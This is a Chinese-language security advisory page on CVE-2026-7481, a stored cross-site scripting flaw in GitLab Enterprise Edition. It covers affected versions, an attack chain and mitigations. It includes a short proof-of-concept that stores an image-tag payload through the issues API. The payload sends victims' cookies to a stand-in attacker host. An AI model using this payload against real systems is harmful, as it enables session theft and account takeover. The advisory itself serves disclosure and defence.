CVE-2026-7481 CVSS 8.7 高危

CVE-2026-7481 GitLab EE存储型XSS漏洞

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7481

漏洞类型

存储型跨站脚本攻击 (Stored XSS)

CVSS评分

8.7 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

GitLab Enterprise Edition (EE)

漏洞概述

GitLab EE 存在输入清理不当的漏洞，允许拥有开发者权限的认证用户注入恶意 JavaScript。该漏洞影响多个版本，攻击者可利用此漏洞在其他用户浏览被污染页面时执行任意代码，导致敏感信息泄露或会话劫持。

技术细节

该漏洞发生在 GitLab EE 的特定功能模块中，由于后端未对用户提交的特定输入数据进行严格的上下文感知转义和过滤，导致攻击者能够植入持久化的恶意脚本。攻击者首先需要具备开发者角色的账户权限，随后在系统支持的交互点（如评论、描述等）注入精心构造的 JavaScript Payload。该 Payload 被存储在服务器数据库中。当其他用户（尤其是具有更高权限的管理员）访问包含该 Payload 的页面时，浏览器会解析并执行该脚本。根据 CVSS 向量 (S:C)，该漏洞可影响浏览器上下文，结合高机密性和完整性影响，攻击者可通过窃取 Session ID 完全接管受害者账户，或利用受害者权限执行未授权的 API 调用。

攻击链分析

STEP 1

侦察

攻击者识别出目标使用的是存在漏洞的 GitLab EE 版本。

STEP 2

获取权限

攻击者注册或获取一个具有开发者角色的账户。

STEP 3

注入 Payload

攻击者在允许输入文本的功能点（如 Issue 描述）提交恶意 JavaScript 代码。

STEP 4

诱导访问

攻击者诱导管理员或其他目标用户访问包含恶意代码的页面。

STEP 5

执行攻击

目标用户的浏览器解析恶意代码，执行脚本，发送敏感数据给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Conceptual PoC for Stored XSS in GitLab
// Attacker injects payload via API or UI

const maliciousPayload = '<img src=x onerror=fetch(\'https://attacker.com/steal?c=\'+document.cookie)>';

// Simulating the request to store the payload
fetch('https://gitlab.example.com/api/v4/projects/1/issues', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/json',
        'Authorization': 'Bearer <ATTACKER_TOKEN>'
    },
    body: JSON.stringify({
        title: 'Important Issue',
        description: maliciousPayload
    })
}).then(response => console.log('Payload injected'));

// When a victim views the issue, the script executes and exfiltrates cookies.

影响范围

16.4 至 18.9.7 之前

18.10 至 18.10.6 之前

18.11 至 18.11.3 之前

防御指南

临时缓解措施

在升级补丁之前，建议管理员不要轻易点击或查看来源不明的链接和内容。可以在浏览器中禁用 JavaScript 或使用 NoScript 等插件来缓解风险，同时加强对日志的审计，监测异常的数据外传行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表